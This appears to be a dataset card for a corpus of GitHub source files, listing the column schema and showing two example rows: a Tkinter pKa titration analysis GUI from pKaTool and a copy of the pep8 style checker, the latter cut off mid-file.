Dataset schema (one row per source file):

  column         dtype    range / classes
  repo_name      string   length 5 to 92
  path           string   length 4 to 232
  copies         string   19 values
  size           string   length 4 to 7
  content        string   length 721 to 1.04M
  license        string   15 values
  hash           int64    -9,223,277,421,539,062,000 to 9,223,102,107B
  line_mean      float64  6.51 to 99.9
  line_max       int64    15 to 997
  alpha_frac     float64  0.25 to 0.97
  autogenerated  bool     1 class
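A minimal sketch of reading rows with this schema via the Hugging Face `datasets` library; the dataset identifier below is a placeholder, not the dataset's real name.

```python
from datasets import load_dataset

# "user/github-python-code" is a placeholder identifier -- substitute the real name.
ds = load_dataset("user/github-python-code", split="train", streaming=True)
row = next(iter(ds))  # rows are plain dicts keyed by the column names above
print(row["repo_name"], row["path"], row["license"], row["size"])
print(row["content"][:200])  # first 200 characters of the stored source file
```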
Example row 1:
  repo_name: dmnfarrell/peat
  path:      pKaTool/pKa_system.py
  copies:    1
  size:      55804
content (excerpt; the cell holds the complete 55,804-byte source of pKaTool/pKa_system.py, shown here with its original line structure restored):

```python
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# pKaTool - analysis of systems of titratable groups
# Copyright (C) 2010 Jens Erik Nielsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
# Normal mail:
# Jens Nielsen
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland

import sys
from Tkinter import *
import tkFileDialog
import pKa_base, pKa_system_help, pKa_calc, pKa_system_micro, pKa_system_file_menu, CCPS_stab_opt
import pKa_system_data_manipulation
import group_control
import ftir_data

__pKaSystemVersion__ = 1.2

#
# Geometry helper functions
#
def get_y_fromstab(val, span):
    """Get the y coordinate for plotting the stability curve"""
    zero = 10
    graphrange = 180
    if span == 0:
        span = 10
    return (graphrange - val * (graphrange / span)) + zero


class pKa_system(Frame, pKa_base.pKa_base, pKa_system_help.system_help,
                 pKa_system_help.pKsensitivity,
                 pKa_system_help.decompose,
                 pKa_system_micro.Micro_states,
                 pKa_system_file_menu.file_menu,
                 pKa_system_file_menu.fit_menu,
                 pKa_system_data_manipulation.data_manipulation,
                 CCPS_stab_opt.Optimisation_Analysis):
    # ... remainder of the cell: the Tkinter GUI (window and menu construction,
    # titration-curve plotting, pKa calculation via pKa_calc, stability curves,
    # NMR/FTIR fitting routines, export to Ekin), ending in a __main__ block
    # that starts pKa_system(numgroups).mainloop().
```
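As a quick sanity check of the coordinate helper in the excerpt (a sketch added here, not part of the dataset row): with span equal to the 180-pixel graph range, values map linearly onto the canvas, offset by zero = 10.

```python
print(get_y_fromstab(0.0, 180.0))    # 190.0 -> bottom of the graph area
print(get_y_fromstab(180.0, 180.0))  # 10.0  -> top of the graph area
```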
  license:       mit
  hash:          2,878,138,869,651,541,500
  line_mean:     35.954967
  line_max:      667
  alpha_frac:    0.510268
  autogenerated: false
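A hedged sketch of how the derived columns could be computed from `content`. The exact definitions are assumptions, not confirmed by the dataset: `line_mean`/`line_max` are taken to be per-line character counts, and `alpha_frac` the alphabetic fraction of the whole file.

```python
def file_stats(content):
    """Per-file statistics, under the assumed definitions above."""
    lengths = [len(line) for line in content.splitlines()]
    return {
        "line_mean": sum(lengths) / max(len(lengths), 1),
        "line_max": max(lengths, default=0),
        "alpha_frac": sum(c.isalpha() for c in content) / max(len(content), 1),
    }
```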
Example row 2:
  repo_name: alexfalcucc/anaconda
  path:      anaconda_lib/linting/pep8.py
  copies:    1
  size:      79405
content (excerpt; the cell holds the 79,405-byte source of anaconda_lib/linting/pep8.py, the pep8 style checker at version 1.6.0a0, and is cut off mid-file in this preview along with row 2's remaining fields):

```python
#!/usr/bin/env python
# pep8.py - Check Python source code formatting, according to PEP 8
# Copyright (C) 2006-2009 Johann C. Rocholl <[email protected]>
# Copyright (C) 2009-2014 Florent Xicluna <[email protected]>
# Copyright (C) 2014 Ian Lee <[email protected]>
# (MIT licence; full permission notice in the file)

r"""
Check Python source code formatting, according to PEP 8.

For usage and a list of options, try this:

$ python pep8.py -h

This program and its regression test suite live here:
http://github.com/jcrocholl/pep8

Groups of errors and warnings:
E errors
W warnings
100 indentation
200 whitespace
300 blank lines
400 imports
500 line length
600 deprecation
700 statements
900 syntax error
"""
from __future__ import with_statement

import os
import sys
import re
import time
import inspect
import keyword
import tokenize
from optparse import OptionParser
from fnmatch import fnmatch

try:
    from configparser import RawConfigParser
    from io import TextIOWrapper
except ImportError:
    from ConfigParser import RawConfigParser

__version__ = '1.6.0a0'

DEFAULT_EXCLUDE = '.svn,CVS,.bzr,.hg,.git,__pycache__,.tox'
DEFAULT_IGNORE = 'E121,E123,E126,E226,E24,E704'
MAX_LINE_LENGTH = 150


def tabs_or_spaces(physical_line, indent_char):
    r"""Never mix tabs and spaces.

    The most popular way of indenting Python is with spaces only. The
    second-most popular way is with tabs only. Code indented with a mixture
    of tabs and spaces should be converted to using spaces exclusively.

    Okay: if a == 0:\n        a = 1\n        b = 1
    E101: if a == 0:\n        a = 1\n\tb = 1
    """
    indent = INDENT_REGEX.match(physical_line).group(1)
    for offset, char in enumerate(indent):
        if char != indent_char:
            return offset, "E101 indentation contains mixed spaces and tabs"
```

Each check in the file is a plain function like the one above, operating on a physical or logical line and returning or yielding (offset, "Exxx message") pairs. The truncated cell continues through the remaining physical- and logical-line checks (trailing whitespace, line length, blank lines, continuation indentation, operator and comma spacing) and breaks off inside the whitespace_before_comment docstring.
Okay: x = x + 1 # Increment x Okay: x = x + 1 # Increment x Okay: # Block comment E261: x = x + 1 # Increment x E262: x = x + 1 #Increment x E262: x = x + 1 # Increment x E265: #Block comment E266: ### Block comment """ prev_end = (0, 0) for token_type, text, start, end, line in tokens: if token_type == tokenize.COMMENT: inline_comment = line[:start[1]].strip() if inline_comment: if prev_end[0] == start[0] and start[1] < prev_end[1] + 2: yield (prev_end, "E261 at least two spaces before inline comment") symbol, sp, comment = text.partition(' ') bad_prefix = symbol not in '#:' and (symbol.lstrip('#')[:1] or '#') if inline_comment: if bad_prefix or comment[:1] in WHITESPACE: yield start, "E262 inline comment should start with '# '" elif bad_prefix and (bad_prefix != '!' or start[0] > 1): if bad_prefix != '#': yield start, "E265 block comment should start with '# '" elif comment: yield start, "E266 too many leading '#' for block comment" elif token_type != tokenize.NL: prev_end = end def imports_on_separate_lines(logical_line): r"""Imports should usually be on separate lines. Okay: import os\nimport sys E401: import sys, os Okay: from subprocess import Popen, PIPE Okay: from myclas import MyClass Okay: from foo.bar.yourclass import YourClass Okay: import myclass Okay: import foo.bar.yourclass """ line = logical_line if line.startswith('import '): found = line.find(',') if -1 < found and ';' not in line[:found]: yield found, "E401 multiple imports on one line" def module_imports_on_top_of_file( logical_line, indent_level, checker_state, noqa): r"""Imports are always put at the top of the file, just after any module comments and docstrings, and before module globals and constants. Okay: import os Okay: # this is a comment\nimport os Okay: '''this is a module docstring'''\nimport os Okay: r'''this is a module docstring'''\nimport os Okay: try:\n import x\nexcept:\n pass\nelse:\n pass\nimport y Okay: try:\n import x\nexcept:\n pass\nfinally:\n pass\nimport y E402: a=1\nimport os E402: 'One string'\n"Two string"\nimport os E402: a=1\nfrom sys import x Okay: if x:\n import os """ def is_string_literal(line): if line[0] in 'uUbB': line = line[1:] if line and line[0] in 'rR': line = line[1:] return line and (line[0] == '"' or line[0] == "'") allowed_try_keywords = ('try', 'except', 'else', 'finally') if indent_level: # Allow imports in conditional statements or functions return if not logical_line: # Allow empty lines or comments return if noqa: return line = logical_line if line.startswith('import ') or line.startswith('from '): if checker_state.get('seen_non_imports', False): yield 0, "E402 module level import not at top of file" elif any(line.startswith(kw) for kw in allowed_try_keywords): # Allow try, except, else, finally keywords intermixed with imports in # order to support conditional importing return elif is_string_literal(line): # The first literal is a docstring, allow it. Otherwise, report error. if checker_state.get('seen_docstring', False): checker_state['seen_non_imports'] = True else: checker_state['seen_docstring'] = True else: checker_state['seen_non_imports'] = True def compound_statements(logical_line): r"""Compound statements (on the same line) are generally discouraged. While sometimes it's okay to put an if/for/while with a small body on the same line, never do this for multi-clause statements. Also avoid folding such long lines! Always use a def statement instead of an assignment statement that binds a lambda expression directly to a name. 
Okay: if foo == 'blah':\n do_blah_thing() Okay: do_one() Okay: do_two() Okay: do_three() E701: if foo == 'blah': do_blah_thing() E701: for x in lst: total += x E701: while t < 10: t = delay() E701: if foo == 'blah': do_blah_thing() E701: else: do_non_blah_thing() E701: try: something() E701: finally: cleanup() E701: if foo == 'blah': one(); two(); three() E702: do_one(); do_two(); do_three() E703: do_four(); # useless semicolon E704: def f(x): return 2*x E731: f = lambda x: 2*x """ line = logical_line last_char = len(line) - 1 found = line.find(':') while -1 < found < last_char: before = line[:found] if ((before.count('{') <= before.count('}') and # {'a': 1} (dict) before.count('[') <= before.count(']') and # [1:2] (slice) before.count('(') <= before.count(')'))): # (annotation) lambda_kw = LAMBDA_REGEX.search(before) if lambda_kw: before = line[:lambda_kw.start()].rstrip() if before[-1:] == '=' and isidentifier(before[:-1].strip()): yield 0, ("E731 do not assign a lambda expression, use a " "def") break if before.startswith('def '): yield 0, "E704 multiple statements on one line (def)" else: yield found, "E701 multiple statements on one line (colon)" found = line.find(':', found + 1) found = line.find(';') while -1 < found: if found < last_char: yield found, "E702 multiple statements on one line (semicolon)" else: yield found, "E703 statement ends with a semicolon" found = line.find(';', found + 1) def explicit_line_join(logical_line, tokens): r"""Avoid explicit line join between brackets. The preferred way of wrapping long lines is by using Python's implied line continuation inside parentheses, brackets and braces. Long lines can be broken over multiple lines by wrapping expressions in parentheses. These should be used in preference to using a backslash for line continuation. E502: aaa = [123, \\n 123] E502: aaa = ("bbb " \\n "ccc") Okay: aaa = [123,\n 123] Okay: aaa = ("bbb "\n "ccc") Okay: aaa = "bbb " \\n "ccc" """ prev_start = prev_end = parens = 0 for token_type, text, start, end, line in tokens: if start[0] != prev_start and parens and backslash: yield backslash, "E502 the backslash is redundant between brackets" if end[0] != prev_end: if line.rstrip('\r\n').endswith('\\'): backslash = (end[0], len(line.splitlines()[-1]) - 1) else: backslash = None prev_start = prev_end = end[0] else: prev_start = start[0] if token_type == tokenize.OP: if text in '([{': parens += 1 elif text in ')]}': parens -= 1 def comparison_to_singleton(logical_line, noqa): r"""Comparison to singletons should use "is" or "is not". Comparisons to singletons like None should always be done with "is" or "is not", never the equality operators. Okay: if arg is not None: E711: if arg != None: E711: if None == arg: E712: if arg == True: E712: if False == arg: Also, beware of writing if x when you really mean if x is not None -- e.g. when testing whether a variable or argument that defaults to None was set to some other value. The other value might have a type (such as a container) that could be false in a boolean context! 
""" match = not noqa and COMPARE_SINGLETON_REGEX.search(logical_line) if match: singleton = match.group(1) or match.group(3) same = (match.group(2) == '==') msg = "'if cond is %s:'" % (('' if same else 'not ') + singleton) if singleton in ('None',): code = 'E711' else: code = 'E712' nonzero = ((singleton == 'True' and same) or (singleton == 'False' and not same)) msg += " or 'if %scond:'" % ('' if nonzero else 'not ') yield match.start(2), ("%s comparison to %s should be %s" % (code, singleton, msg)) def comparison_negative(logical_line): r"""Negative comparison should be done using "not in" and "is not". Okay: if x not in y:\n pass Okay: assert (X in Y or X is Z) Okay: if not (X in Y):\n pass Okay: zz = x is not y E713: Z = not X in Y E713: if not X.B in Y:\n pass E714: if not X is Y:\n pass E714: Z = not X.B is Y """ match = COMPARE_NEGATIVE_REGEX.search(logical_line) if match: pos = match.start(1) if match.group(2) == 'in': yield pos, "E713 test for membership should be 'not in'" else: yield pos, "E714 test for object identity should be 'is not'" def comparison_type(logical_line): r"""Object type comparisons should always use isinstance(). Do not compare types directly. Okay: if isinstance(obj, int): E721: if type(obj) is type(1): When checking if an object is a string, keep in mind that it might be a unicode string too! In Python 2.3, str and unicode have a common base class, basestring, so you can do: Okay: if isinstance(obj, basestring): Okay: if type(a1) is type(b1): """ match = COMPARE_TYPE_REGEX.search(logical_line) if match: inst = match.group(1) if inst and isidentifier(inst) and inst not in SINGLETONS: return # Allow comparison for types which are not obvious yield match.start(), "E721 do not compare types, use 'isinstance()'" def python_3000_has_key(logical_line, noqa): r"""The {}.has_key() method is removed in Python 3: use the 'in' operator. Okay: if "alph" in d:\n print d["alph"] W601: assert d.has_key('alph') """ pos = logical_line.find('.has_key(') if pos > -1 and not noqa: yield pos, "W601 .has_key() is deprecated, use 'in'" def python_3000_raise_comma(logical_line): r"""When raising an exception, use "raise ValueError('message')". The older form is removed in Python 3. Okay: raise DummyError("Message") W602: raise DummyError, "Message" """ match = RAISE_COMMA_REGEX.match(logical_line) if match and not RERAISE_COMMA_REGEX.match(logical_line): yield match.end() - 1, "W602 deprecated form of raising exception" def python_3000_not_equal(logical_line): r"""New code should always use != instead of <>. The older syntax is removed in Python 3. Okay: if a != 'no': W603: if a <> 'no': """ pos = logical_line.find('<>') if pos > -1: yield pos, "W603 '<>' is deprecated, use '!='" def python_3000_backticks(logical_line): r"""Backticks are removed in Python 3: use repr() instead. Okay: val = repr(1 + 2) W604: val = `1 + 2` """ pos = logical_line.find('`') if pos > -1: yield pos, "W604 backticks are deprecated, use 'repr()'" ############################################################################## # Helper functions ############################################################################## if '' == ''.encode(): # Python 2: implicit encoding. 
def readlines(filename): """Read the source code.""" with open(filename, 'rU') as f: return f.readlines() isidentifier = re.compile(r'[a-zA-Z_]\w*$').match stdin_get_value = sys.stdin.read else: # Python 3 def readlines(filename): """Read the source code.""" try: with open(filename, 'rb') as f: (coding, lines) = tokenize.detect_encoding(f.readline) f = TextIOWrapper(f, coding, line_buffering=True) return [l.decode(coding) for l in lines] + f.readlines() except (LookupError, SyntaxError, UnicodeError): # Fall back if file encoding is improperly declared with open(filename, encoding='latin-1') as f: return f.readlines() isidentifier = str.isidentifier def stdin_get_value(): return TextIOWrapper(sys.stdin.buffer, errors='ignore').read() noqa = re.compile(r'# no(?:qa|pep8)\b', re.I).search def expand_indent(line): r"""Return the amount of indentation. Tabs are expanded to the next multiple of 8. >>> expand_indent(' ') 4 >>> expand_indent('\t') 8 >>> expand_indent(' \t') 8 >>> expand_indent(' \t') 16 """ if '\t' not in line: return len(line) - len(line.lstrip()) result = 0 for char in line: if char == '\t': result = result // 8 * 8 + 8 elif char == ' ': result += 1 else: break return result def mute_string(text): """Replace contents with 'xxx' to prevent syntax matching. >>> mute_string('"abc"') '"xxx"' >>> mute_string("'''abc'''") "'''xxx'''" >>> mute_string("r'abc'") "r'xxx'" """ # String modifiers (e.g. u or r) start = text.index(text[-1]) + 1 end = len(text) - 1 # Triple quotes if text[-3:] in ('"""', "'''"): start += 2 end -= 2 return text[:start] + 'x' * (end - start) + text[end:] def parse_udiff(diff, patterns=None, parent='.'): """Return a dictionary of matching lines.""" # For each file of the diff, the entry key is the filename, # and the value is a set of row numbers to consider. rv = {} path = nrows = None for line in diff.splitlines(): if nrows: if line[:1] != '-': nrows -= 1 continue if line[:3] == '@@ ': hunk_match = HUNK_REGEX.match(line) (row, nrows) = [int(g or '1') for g in hunk_match.groups()] rv[path].update(range(row, row + nrows)) elif line[:3] == '+++': path = line[4:].split('\t', 1)[0] if path[:2] == 'b/': path = path[2:] rv[path] = set() return dict([(os.path.join(parent, path), rows) for (path, rows) in rv.items() if rows and filename_match(path, patterns)]) def normalize_paths(value, parent=os.curdir): """Parse a comma-separated list of paths. Return a list of absolute paths. """ if not value: return [] if isinstance(value, list): return value paths = [] for path in value.split(','): path = path.strip() if '/' in path: path = os.path.abspath(os.path.join(parent, path)) paths.append(path.rstrip('/')) return paths def filename_match(filename, patterns, default=True): """Check if patterns contains a pattern that matches filename. If patterns is unspecified, this always returns True. 
""" if not patterns: return default return any(fnmatch(filename, pattern) for pattern in patterns) def _is_eol_token(token): return token[0] in NEWLINE or token[4][token[3][1]:].lstrip() == '\\\n' if COMMENT_WITH_NL: def _is_eol_token(token, _eol_token=_is_eol_token): return _eol_token(token) or (token[0] == tokenize.COMMENT and token[1] == token[4]) ############################################################################## # Framework to run all checks ############################################################################## _checks = {'physical_line': {}, 'logical_line': {}, 'tree': {}} def register_check(check, codes=None): """Register a new check object.""" def _add_check(check, kind, codes, args): if check in _checks[kind]: _checks[kind][check][0].extend(codes or []) else: _checks[kind][check] = (codes or [''], args) if inspect.isfunction(check): args = inspect.getargspec(check)[0] if args and args[0] in ('physical_line', 'logical_line'): if codes is None: codes = ERRORCODE_REGEX.findall(check.__doc__ or '') _add_check(check, args[0], codes, args) elif inspect.isclass(check): if inspect.getargspec(check.__init__)[0][:2] == ['self', 'tree']: _add_check(check, 'tree', codes, None) def init_checks_registry(): """Register all globally visible functions. The first argument name is either 'physical_line' or 'logical_line'. """ mod = inspect.getmodule(register_check) for (name, function) in inspect.getmembers(mod, inspect.isfunction): register_check(function) init_checks_registry() class Checker(object): """Load a Python source file, tokenize it, check coding style.""" def __init__(self, filename=None, lines=None, options=None, report=None, **kwargs): if options is None: options = StyleGuide(kwargs).options else: assert not kwargs self._io_error = None self._physical_checks = options.physical_checks self._logical_checks = options.logical_checks self._ast_checks = options.ast_checks self.max_line_length = options.max_line_length self.multiline = False # in a multiline string? self.hang_closing = options.hang_closing self.verbose = options.verbose self.filename = filename # Dictionary where a checker can store its custom state. 
self._checker_states = {} if filename is None: self.filename = 'stdin' self.lines = lines or [] elif filename == '-': self.filename = 'stdin' self.lines = stdin_get_value().splitlines(True) elif lines is None: try: self.lines = readlines(filename) except IOError: (exc_type, exc) = sys.exc_info()[:2] self._io_error = '%s: %s' % (exc_type.__name__, exc) self.lines = [] else: self.lines = lines if self.lines: ord0 = ord(self.lines[0][0]) if ord0 in (0xef, 0xfeff): # Strip the UTF-8 BOM if ord0 == 0xfeff: self.lines[0] = self.lines[0][1:] elif self.lines[0][:3] == '\xef\xbb\xbf': self.lines[0] = self.lines[0][3:] self.report = report or options.report self.report_error = self.report.error def report_invalid_syntax(self): """Check if the syntax is valid.""" (exc_type, exc) = sys.exc_info()[:2] if len(exc.args) > 1: offset = exc.args[1] if len(offset) > 2: offset = offset[1:3] else: offset = (1, 0) self.report_error(offset[0], offset[1] or 0, 'E901 %s: %s' % (exc_type.__name__, exc.args[0]), self.report_invalid_syntax) def readline(self): """Get the next line from the input buffer.""" if self.line_number >= self.total_lines: return '' line = self.lines[self.line_number] self.line_number += 1 if self.indent_char is None and line[:1] in WHITESPACE: self.indent_char = line[0] return line def run_check(self, check, argument_names): """Run a check plugin.""" arguments = [] for name in argument_names: arguments.append(getattr(self, name)) return check(*arguments) def init_checker_state(self, name, argument_names): """ Prepares a custom state for the specific checker plugin.""" if 'checker_state' in argument_names: self.checker_state = self._checker_states.setdefault(name, {}) def check_physical(self, line): """Run all physical checks on a raw input line.""" self.physical_line = line for name, check, argument_names in self._physical_checks: self.init_checker_state(name, argument_names) result = self.run_check(check, argument_names) if result is not None: (offset, text) = result self.report_error(self.line_number, offset, text, check) if text[:4] == 'E101': self.indent_char = line[0] def build_tokens_line(self): """Build a logical line from tokens.""" logical = [] comments = [] length = 0 prev_row = prev_col = mapping = None for token_type, text, start, end, line in self.tokens: if token_type in SKIP_TOKENS: continue if not mapping: mapping = [(0, start)] if token_type == tokenize.COMMENT: comments.append(text) continue if token_type == tokenize.STRING: text = mute_string(text) if prev_row: (start_row, start_col) = start if prev_row != start_row: # different row prev_text = self.lines[prev_row - 1][prev_col - 1] if prev_text == ',' or (prev_text not in '{[(' and text not in '}])'): text = ' ' + text elif prev_col != start_col: # different column text = line[prev_col:start_col] + text logical.append(text) length += len(text) mapping.append((length, end)) (prev_row, prev_col) = end self.logical_line = ''.join(logical) self.noqa = comments and noqa(''.join(comments)) return mapping def check_logical(self): """Build a line from tokens and run all logical checks on it.""" self.report.increment_logical_line() mapping = self.build_tokens_line() if not mapping: return (start_row, start_col) = mapping[0][1] start_line = self.lines[start_row - 1] self.indent_level = expand_indent(start_line[:start_col]) if self.blank_before < self.blank_lines: self.blank_before = self.blank_lines if self.verbose >= 2: print(self.logical_line[:80].rstrip()) for name, check, argument_names in self._logical_checks: if self.verbose 
>= 4: print(' ' + name) self.init_checker_state(name, argument_names) for offset, text in self.run_check(check, argument_names) or (): if not isinstance(offset, tuple): for token_offset, pos in mapping: if offset <= token_offset: break offset = (pos[0], pos[1] + offset - token_offset) self.report_error(offset[0], offset[1], text, check) if self.logical_line: self.previous_indent_level = self.indent_level self.previous_logical = self.logical_line self.blank_lines = 0 self.tokens = [] def check_ast(self): """Build the file's AST and run all AST checks.""" try: tree = compile(''.join(self.lines), '', 'exec', PyCF_ONLY_AST) except (SyntaxError, TypeError): return self.report_invalid_syntax() for name, cls, __ in self._ast_checks: checker = cls(tree, self.filename) for lineno, offset, text, check in checker.run(): if not self.lines or not noqa(self.lines[lineno - 1]): self.report_error(lineno, offset, text, check) def generate_tokens(self): """Tokenize the file, run physical line checks and yield tokens.""" if self._io_error: self.report_error(1, 0, 'E902 %s' % self._io_error, readlines) tokengen = tokenize.generate_tokens(self.readline) try: for token in tokengen: if token[2][0] > self.total_lines: return self.maybe_check_physical(token) yield token except (SyntaxError, tokenize.TokenError): self.report_invalid_syntax() def maybe_check_physical(self, token): """If appropriate (based on token), check current physical line(s).""" # Called after every token, but act only on end of line. if _is_eol_token(token): # Obviously, a newline token ends a single physical line. self.check_physical(token[4]) elif token[0] == tokenize.STRING and '\n' in token[1]: # Less obviously, a string that contains newlines is a # multiline string, either triple-quoted or with internal # newlines backslash-escaped. Check every physical line in the # string *except* for the last one: its newline is outside of # the multiline string, so we consider it a regular physical # line, and will check it like any other physical line. 
# # Subtleties: # - we don't *completely* ignore the last line; if it contains # the magical "# noqa" comment, we disable all physical # checks for the entire multiline string # - have to wind self.line_number back because initially it # points to the last line of the string, and we want # check_physical() to give accurate feedback if noqa(token[4]): return self.multiline = True self.line_number = token[2][0] for line in token[1].split('\n')[:-1]: self.check_physical(line + '\n') self.line_number += 1 self.multiline = False def check_all(self, expected=None, line_offset=0): """Run all checks on the input file.""" self.report.init_file(self.filename, self.lines, expected, line_offset) self.total_lines = len(self.lines) if self._ast_checks: self.check_ast() self.line_number = 0 self.indent_char = None self.indent_level = self.previous_indent_level = 0 self.previous_logical = '' self.tokens = [] self.blank_lines = self.blank_before = 0 parens = 0 for token in self.generate_tokens(): self.tokens.append(token) token_type, text = token[0:2] if self.verbose >= 3: if token[2][0] == token[3][0]: pos = '[%s:%s]' % (token[2][1] or '', token[3][1]) else: pos = 'l.%s' % token[3][0] print('l.%s\t%s\t%s\t%r' % (token[2][0], pos, tokenize.tok_name[token[0]], text)) if token_type == tokenize.OP: if text in '([{': parens += 1 elif text in '}])': parens -= 1 elif not parens: if token_type in NEWLINE: if token_type == tokenize.NEWLINE: self.check_logical() self.blank_before = 0 elif len(self.tokens) == 1: # The physical line contains only this token. self.blank_lines += 1 del self.tokens[0] else: self.check_logical() elif COMMENT_WITH_NL and token_type == tokenize.COMMENT: if len(self.tokens) == 1: # The comment also ends a physical line token = list(token) token[1] = text.rstrip('\r\n') token[3] = (token[2][0], token[2][1] + len(token[1])) self.tokens = [tuple(token)] self.check_logical() if self.tokens: self.check_physical(self.lines[-1]) self.check_logical() return self.report.get_file_results() class BaseReport(object): """Collect the results of the checks.""" print_filename = False def __init__(self, options): self._benchmark_keys = options.benchmark_keys self._ignore_code = options.ignore_code # Results self.elapsed = 0 self.total_errors = 0 self.counters = dict.fromkeys(self._benchmark_keys, 0) self.messages = {} def start(self): """Start the timer.""" self._start_time = time.time() def stop(self): """Stop the timer.""" self.elapsed = time.time() - self._start_time def init_file(self, filename, lines, expected, line_offset): """Signal a new file.""" self.filename = filename self.lines = lines self.expected = expected or () self.line_offset = line_offset self.file_errors = 0 self.counters['files'] += 1 self.counters['physical lines'] += len(lines) def increment_logical_line(self): """Signal a new logical line.""" self.counters['logical lines'] += 1 def error(self, line_number, offset, text, check): """Report an error, according to options.""" code = text[:4] if self._ignore_code(code): return if code in self.counters: self.counters[code] += 1 else: self.counters[code] = 1 self.messages[code] = text[5:] # Don't care about expected errors or warnings if code in self.expected: return if self.print_filename and not self.file_errors: print(self.filename) self.file_errors += 1 self.total_errors += 1 return code def get_file_results(self): """Return the count of errors and warnings for this file.""" return self.file_errors def get_count(self, prefix=''): """Return the total count of errors and warnings.""" 
return sum([self.counters[key] for key in self.messages if key.startswith(prefix)]) def get_statistics(self, prefix=''): """Get statistics for message codes that start with the prefix. prefix='' matches all errors and warnings prefix='E' matches all errors prefix='W' matches all warnings prefix='E4' matches all errors that have to do with imports """ return ['%-7s %s %s' % (self.counters[key], key, self.messages[key]) for key in sorted(self.messages) if key.startswith(prefix)] def print_statistics(self, prefix=''): """Print overall statistics (number of errors and warnings).""" for line in self.get_statistics(prefix): print(line) def print_benchmark(self): """Print benchmark numbers.""" print('%-7.2f %s' % (self.elapsed, 'seconds elapsed')) if self.elapsed: for key in self._benchmark_keys: print('%-7d %s per second (%d total)' % (self.counters[key] / self.elapsed, key, self.counters[key])) class FileReport(BaseReport): """Collect the results of the checks and print only the filenames.""" print_filename = True class StandardReport(BaseReport): """Collect and print the results of the checks.""" def __init__(self, options): super(StandardReport, self).__init__(options) self._fmt = REPORT_FORMAT.get(options.format.lower(), options.format) self._repeat = options.repeat self._show_source = options.show_source self._show_pep8 = options.show_pep8 def init_file(self, filename, lines, expected, line_offset): """Signal a new file.""" self._deferred_print = [] return super(StandardReport, self).init_file( filename, lines, expected, line_offset) def error(self, line_number, offset, text, check): """Report an error, according to options.""" code = super(StandardReport, self).error(line_number, offset, text, check) if code and (self.counters[code] == 1 or self._repeat): self._deferred_print.append( (line_number, offset, code, text[5:], check.__doc__)) return code def get_file_results(self): """Print the result and return the overall count for this file.""" self._deferred_print.sort() for line_number, offset, code, text, doc in self._deferred_print: print(self._fmt % { 'path': self.filename, 'row': self.line_offset + line_number, 'col': offset + 1, 'code': code, 'text': text, }) if self._show_source: if line_number > len(self.lines): line = '' else: line = self.lines[line_number - 1] print(line.rstrip()) print(re.sub(r'\S', ' ', line[:offset]) + '^') if self._show_pep8 and doc: print(' ' + doc.strip()) return self.file_errors class DiffReport(StandardReport): """Collect and print the results for the changed lines only.""" def __init__(self, options): super(DiffReport, self).__init__(options) self._selected = options.selected_lines def error(self, line_number, offset, text, check): if line_number not in self._selected[self.filename]: return return super(DiffReport, self).error(line_number, offset, text, check) class StyleGuide(object): """Initialize a PEP-8 instance with few options.""" def __init__(self, *args, **kwargs): # build options from the command line self.checker_class = kwargs.pop('checker_class', Checker) parse_argv = kwargs.pop('parse_argv', False) config_file = kwargs.pop('config_file', None) parser = kwargs.pop('parser', None) # build options from dict options_dict = dict(*args, **kwargs) arglist = None if parse_argv else options_dict.get('paths', None) options, self.paths = process_options( arglist, parse_argv, config_file, parser) if options_dict: options.__dict__.update(options_dict) if 'paths' in options_dict: self.paths = options_dict['paths'] self.runner = self.input_file self.options 
= options if not options.reporter: options.reporter = BaseReport if options.quiet else StandardReport options.select = tuple(options.select or ()) if not (options.select or options.ignore or options.testsuite or options.doctest) and DEFAULT_IGNORE: # The default choice: ignore controversial checks options.ignore = tuple(DEFAULT_IGNORE.split(',')) else: # Ignore all checks which are not explicitly selected options.ignore = ('',) if options.select else tuple(options.ignore) options.benchmark_keys = BENCHMARK_KEYS[:] options.ignore_code = self.ignore_code options.physical_checks = self.get_checks('physical_line') options.logical_checks = self.get_checks('logical_line') options.ast_checks = self.get_checks('tree') self.init_report() def init_report(self, reporter=None): """Initialize the report instance.""" self.options.report = (reporter or self.options.reporter)(self.options) return self.options.report def check_files(self, paths=None): """Run all checks on the paths.""" if paths is None: paths = self.paths report = self.options.report runner = self.runner report.start() try: for path in paths: if os.path.isdir(path): self.input_dir(path) elif not self.excluded(path): runner(path) except KeyboardInterrupt: print('... stopped') report.stop() return report def input_file(self, filename, lines=None, expected=None, line_offset=0): """Run all checks on a Python source file.""" if self.options.verbose: print('checking %s' % filename) fchecker = self.checker_class( filename, lines=lines, options=self.options) return fchecker.check_all(expected=expected, line_offset=line_offset) def input_dir(self, dirname): """Check all files in this directory and all subdirectories.""" dirname = dirname.rstrip('/') if self.excluded(dirname): return 0 counters = self.options.report.counters verbose = self.options.verbose filepatterns = self.options.filename runner = self.runner for root, dirs, files in os.walk(dirname): if verbose: print('directory ' + root) counters['directories'] += 1 for subdir in sorted(dirs): if self.excluded(subdir, root): dirs.remove(subdir) for filename in sorted(files): # contain a pattern that matches? if ((filename_match(filename, filepatterns) and not self.excluded(filename, root))): runner(os.path.join(root, filename)) def excluded(self, filename, parent=None): """Check if the file should be excluded. Check if 'options.exclude' contains a pattern that matches filename. """ if not self.options.exclude: return False basename = os.path.basename(filename) if filename_match(basename, self.options.exclude): return True if parent: filename = os.path.join(parent, filename) filename = os.path.abspath(filename) return filename_match(filename, self.options.exclude) def ignore_code(self, code): """Check if the error code should be ignored. If 'options.select' contains a prefix of the error code, return False. Else, if 'options.ignore' contains a prefix of the error code, return True. """ if len(code) < 4 and any(s.startswith(code) for s in self.options.select): return False return (code.startswith(self.options.ignore) and not code.startswith(self.options.select)) def get_checks(self, argument_name): """Get all the checks for this category. Find all globally visible functions where the first argument name starts with argument_name and which contain selected tests. 
